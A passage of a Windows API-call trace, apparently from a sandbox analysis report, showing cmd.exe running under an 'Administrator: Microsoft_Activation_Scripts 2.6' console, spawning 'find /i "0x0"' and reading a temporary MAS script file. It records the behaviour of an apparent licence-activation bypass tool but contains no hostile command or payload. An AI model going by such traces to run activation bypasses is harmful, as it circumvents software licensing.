_String2="COLOR") returned 3 [0176.062] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0176.062] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0176.062] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0176.062] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0176.062] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0176.062] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0176.062] _wcsicmp (_String1="find", _String2="CD") returned 3 [0176.062] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0176.062] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0176.062] _wcsicmp (_String1="find", _String2="REN") returned -12 [0176.062] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0176.062] _wcsicmp (_String1="find", _String2="SET") returned -13 [0176.062] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0176.062] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0176.062] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0176.062] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0176.062] _wcsicmp (_String1="find", _String2="MD") returned -7 [0176.062] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0176.062] _wcsicmp (_String1="find", _String2="RD") returned -12 [0176.062] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0176.062] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0176.063] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0176.063] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0176.063] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0176.063] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0176.063] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0176.063] _wcsicmp (_String1="find", _String2="VER") returned -16 [0176.063] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0176.063] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0176.093] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0176.093] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0176.093] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0176.093] _wcsicmp (_String1="find", _String2="START") returned -13 [0176.093] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0176.093] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0176.093] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0176.093] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0176.093] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0176.093] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0176.094] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0176.094] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0176.094] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0176.094] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0176.094] _wcsicmp (_String1="find", _String2="FOR") returned -6 [0176.094] _wcsicmp (_String1="find", _String2="IF") returned -3 [0176.094] _wcsicmp (_String1="find", _String2="REM") returned -12 [0176.094] GetProcessHeap () returned 0x19a8f1e0000 [0176.094] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f201de0 [0176.094] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0176.094] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0176.094] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0176.094] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0176.094] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0176.094] _wcsicmp (_String1="find", _String2="CD") returned 3 [0176.094] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0176.094] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0176.094] _wcsicmp (_String1="find", _String2="REN") returned -12 [0176.094] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0176.094] _wcsicmp (_String1="find", _String2="SET") returned -13 [0176.094] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0176.094] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0176.095] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0176.095] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0176.095] _wcsicmp (_String1="find", _String2="MD") returned -7 [0176.095] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0176.095] _wcsicmp (_String1="find", _String2="RD") returned -12 [0176.095] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0176.095] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0176.095] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0176.095] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0176.095] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0176.095] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0176.095] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0176.095] _wcsicmp (_String1="find", _String2="VER") returned -16 [0176.095] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0176.095] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0176.095] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0176.095] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0176.095] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0176.095] _wcsicmp (_String1="find", _String2="START") returned -13 [0176.095] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0176.095] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0176.095] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0176.095] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0176.095] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0176.095] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0176.095] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0176.095] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0176.095] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0176.095] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0176.095] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0176.096] GetProcessHeap () returned 0x19a8f1e0000 [0176.096] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f1ea550 [0176.096] SetErrorMode (uMode=0x0) returned 0x0 [0176.096] SetErrorMode (uMode=0x1) returned 0x0 [0176.096] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f1ea560, lpFilePart=0x43f9efe980 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x43f9efe980*="System32") returned 0x13 [0176.096] SetErrorMode (uMode=0x0) returned 0x1 [0176.096] GetProcessHeap () returned 0x19a8f1e0000 [0176.096] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea550, Size=0x42) returned 0x19a8f1ea550 [0176.096] GetProcessHeap () returned 0x19a8f1e0000 [0176.096] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea550) returned 0x42 [0176.096] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0176.096] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0176.096] GetProcessHeap () returned 0x19a8f1e0000 [0176.096] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1fb8f0 [0176.096] GetProcessHeap () returned 0x19a8f1e0000 [0176.096] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1ea5b0 [0176.096] GetProcessHeap () returned 0x19a8f1e0000 [0176.096] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea5b0, Size=0xf0) returned 0x19a8f1ea5b0 [0176.096] GetProcessHeap () returned 0x19a8f1e0000 [0176.096] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea5b0) returned 0xf0 [0176.096] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0176.096] GetProcessHeap () returned 0x19a8f1e0000 [0176.096] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f205e00 [0176.096] GetProcessHeap () returned 0x19a8f1e0000 [0176.096] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f205e00, Size=0x88) returned 0x19a8f205e00 [0176.096] GetProcessHeap () returned 0x19a8f1e0000 [0176.096] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f205e00) returned 0x88 [0176.096] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0176.097] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.*" (normalized: "c:\\windows\\system32\\find.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe700, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe700) returned 0x19a8f1f8a60 [0176.097] FindClose (in: hFindFile=0x19a8f1f8a60 | out: hFindFile=0x19a8f1f8a60) returned 1 [0176.097] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.COM" (normalized: "c:\\windows\\system32\\find.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe700, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe700) returned 0xffffffffffffffff [0176.097] GetLastError () returned 0x2 [0176.097] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.EXE" (normalized: "c:\\windows\\system32\\find.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe700, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe700) returned 0x19a8f1f8ac0 [0176.097] FindClose (in: hFindFile=0x19a8f1f8ac0 | out: hFindFile=0x19a8f1f8ac0) returned 1 [0176.098] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0176.098] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0176.098] GetProcessHeap () returned 0x19a8f1e0000 [0176.098] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb770 [0176.098] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.098] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.098] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.098] GetFileType (hFile=0x24) returned 0x2 [0176.098] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0176.098] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe9b8 | out: lpMode=0x43f9efe9b8) returned 1 [0176.098] _dup (_FileHandle=1) returned 3 [0176.098] _close (_FileHandle=1) returned 0 [0176.098] _wcsicmp (_String1="nul", _String2="con") returned 11 [0176.098] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x43f9efe950, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24 [0176.098] _open_osfhandle (_OSFileHandle=0x24, _Flags=8) returned 1 [0176.098] GetProcessHeap () returned 0x19a8f1e0000 [0176.099] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f1ea6b0 [0176.099] GetProcessHeap () returned 0x19a8f1e0000 [0176.099] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x32) returned 0x19a8f1e0eb0 [0176.099] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0176.099] GetProcessHeap () returned 0x19a8f1e0000 [0176.099] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f1ece20 [0176.099] SetErrorMode (uMode=0x0) returned 0x0 [0176.099] SetErrorMode (uMode=0x1) returned 0x0 [0176.099] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f1ece30, lpFilePart=0x43f9efe710 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x43f9efe710*="System32") returned 0x13 [0176.099] SetErrorMode (uMode=0x0) returned 0x1 [0176.099] GetProcessHeap () returned 0x19a8f1e0000 [0176.099] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ece20, Size=0x42) returned 0x19a8f1ece20 [0176.099] GetProcessHeap () returned 0x19a8f1e0000 [0176.099] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ece20) returned 0x42 [0176.099] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0176.099] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0176.099] GetProcessHeap () returned 0x19a8f1e0000 [0176.099] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1fa4f0 [0176.099] GetProcessHeap () returned 0x19a8f1e0000 [0176.099] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1ece80 [0176.099] GetProcessHeap () returned 0x19a8f1e0000 [0176.099] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ece80, Size=0xf0) returned 0x19a8f1ece80 [0176.099] GetProcessHeap () returned 0x19a8f1e0000 [0176.099] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ece80) returned 0xf0 [0176.099] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0176.099] GetProcessHeap () returned 0x19a8f1e0000 [0176.099] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f205ea0 [0176.100] GetProcessHeap () returned 0x19a8f1e0000 [0176.100] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f205ea0, Size=0x88) returned 0x19a8f205ea0 [0176.100] GetProcessHeap () returned 0x19a8f1e0000 [0176.100] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f205ea0) returned 0x88 [0176.100] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0176.100] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.*" (normalized: "c:\\windows\\system32\\find.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe490, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe490) returned 0x19a8f1f8d60 [0176.100] FindClose (in: hFindFile=0x19a8f1f8d60 | out: hFindFile=0x19a8f1f8d60) returned 1 [0176.100] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.COM" (normalized: "c:\\windows\\system32\\find.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe490, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe490) returned 0xffffffffffffffff [0176.100] GetLastError () returned 0x2 [0176.100] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.EXE" (normalized: "c:\\windows\\system32\\find.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe490, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe490) returned 0x19a8f1f8820 [0176.100] FindClose (in: hFindFile=0x19a8f1f8820 | out: hFindFile=0x19a8f1f8820) returned 1 [0176.100] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0176.100] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0176.101] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe9f0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0176.101] InitializeProcThreadAttributeList (in: lpAttributeList=0x43f9efe910, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x43f9efe810 | out: lpAttributeList=0x43f9efe910, lpSize=0x43f9efe810) returned 1 [0176.101] UpdateProcThreadAttribute (in: lpAttributeList=0x43f9efe910, dwFlags=0x0, Attribute=0x60001, lpValue=0x43f9efe7fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x43f9efe910, lpPreviousValue=0x0) returned 1 [0176.101] GetStartupInfoW (in: lpStartupInfo=0x43f9efe8a0 | out: lpStartupInfo=0x43f9efe8a0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0176.101] GetProcessHeap () returned 0x19a8f1e0000 [0176.101] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb7a0 [0176.101] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0176.101] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0176.101] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0176.101] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0176.101] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0176.101] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0176.101] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0176.101] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0176.101] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0176.101] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0176.101] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0176.101] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="mas=htt", _MaxCount=0x7) returned -10 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="masver=", _MaxCount=0x7) returned -10 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="nul=>nu", _MaxCount=0x7) returned -11 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="nul1=1>", _MaxCount=0x7) returned -11 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="nul2=2>", _MaxCount=0x7) returned -11 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="nul6=2^", _MaxCount=0x7) returned -11 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="psc=pow", _MaxCount=0x7) returned -13 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0176.102] _wcsnicmp (_String1="COPYCMD", _String2="winbuil", _MaxCount=0x7) returned -20 [0176.103] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0176.103] _wcsnicmp (_String1="COPYCMD", _String2="_cmdf=C", _MaxCount=0x7) returned 4 [0176.103] _wcsnicmp (_String1="COPYCMD", _String2="_NCS=1", _MaxCount=0x7) returned 4 [0176.103] GetProcessHeap () returned 0x19a8f1e0000 [0176.104] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb7a0) returned 1 [0176.104] GetProcessHeap () returned 0x19a8f1e0000 [0176.104] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x12) returned 0x19a8f1ecc60 [0176.104] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0176.104] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\find.exe", lpCommandLine="find /i \"0x0\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\System32", lpStartupInfo=0x43f9efe830*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"0x0\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x43f9efe818 | out: lpCommandLine="find /i \"0x0\" ", lpProcessInformation=0x43f9efe818*(hProcess=0x9c, hThread=0x90, dwProcessId=0xd7c, dwThreadId=0xd6c)) returned 1 [0176.111] CloseHandle (hObject=0x90) returned 1 [0176.111] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0176.111] GetProcessHeap () returned 0x19a8f1e0000 [0176.112] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eeb50) returned 1 [0176.112] GetEnvironmentStringsW () returned 0x19a8f1eeb50* [0176.112] GetProcessHeap () returned 0x19a8f1e0000 [0176.112] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xbee) returned 0x19a8f1ef750 [0176.112] memcpy (in: _Dst=0x19a8f1ef750, _Src=0x19a8f1eeb50, _Size=0xbee | out: _Dst=0x19a8f1ef750) returned 0x19a8f1ef750 [0176.112] FreeEnvironmentStringsA (penv="=") returned 1 [0176.112] GetProcessHeap () returned 0x19a8f1e0000 [0176.112] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecc60) returned 1 [0176.112] DeleteProcThreadAttributeList (in: lpAttributeList=0x43f9efe910 | out: lpAttributeList=0x43f9efe910) [0176.112] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0176.113] _close (_FileHandle=3) returned 0 [0176.113] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0176.113] _close (_FileHandle=4) returned 0 [0176.113] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0xffffffff) returned 0x0 [0176.318] GetExitCodeProcess (in: hProcess=0xac, lpExitCode=0x43f9efec98 | out: lpExitCode=0x43f9efec98*=0x0) returned 1 [0176.318] CloseHandle (hObject=0xac) returned 1 [0176.318] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0176.337] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x43f9efec98 | out: lpExitCode=0x43f9efec98*=0x1) returned 1 [0176.337] CloseHandle (hObject=0x9c) returned 1 [0176.337] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.337] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0176.338] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.338] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0176.338] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.338] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0176.339] SetConsoleInputExeNameW () returned 0x1 [0176.339] GetConsoleOutputCP () returned 0x1b5 [0176.339] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0176.339] SetThreadUILanguage (LangId=0x0) returned 0x409 [0176.339] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0176.340] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0176.340] _get_osfhandle (_FileHandle=3) returned 0x9c [0176.340] SetFilePointer (in: hFile=0x9c, lDistanceToMove=3715, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe83 [0176.340] GetProcessHeap () returned 0x19a8f1e0000 [0176.340] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f205ea0) returned 1 [0176.341] GetProcessHeap () returned 0x19a8f1e0000 [0176.341] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ece80) returned 1 [0176.341] GetProcessHeap () returned 0x19a8f1e0000 [0176.342] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa4f0) returned 1 [0176.342] GetProcessHeap () returned 0x19a8f1e0000 [0176.343] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ece20) returned 1 [0176.343] GetProcessHeap () returned 0x19a8f1e0000 [0176.343] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0eb0) returned 1 [0176.343] GetProcessHeap () returned 0x19a8f1e0000 [0176.344] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea6b0) returned 1 [0176.344] GetProcessHeap () returned 0x19a8f1e0000 [0176.345] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0176.395] GetProcessHeap () returned 0x19a8f1e0000 [0176.395] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f205e00) returned 1 [0176.395] GetProcessHeap () returned 0x19a8f1e0000 [0176.395] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea5b0) returned 1 [0176.395] GetProcessHeap () returned 0x19a8f1e0000 [0176.395] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb8f0) returned 1 [0176.395] GetProcessHeap () returned 0x19a8f1e0000 [0176.396] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea550) returned 1 [0176.396] GetProcessHeap () returned 0x19a8f1e0000 [0176.396] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f201de0) returned 1 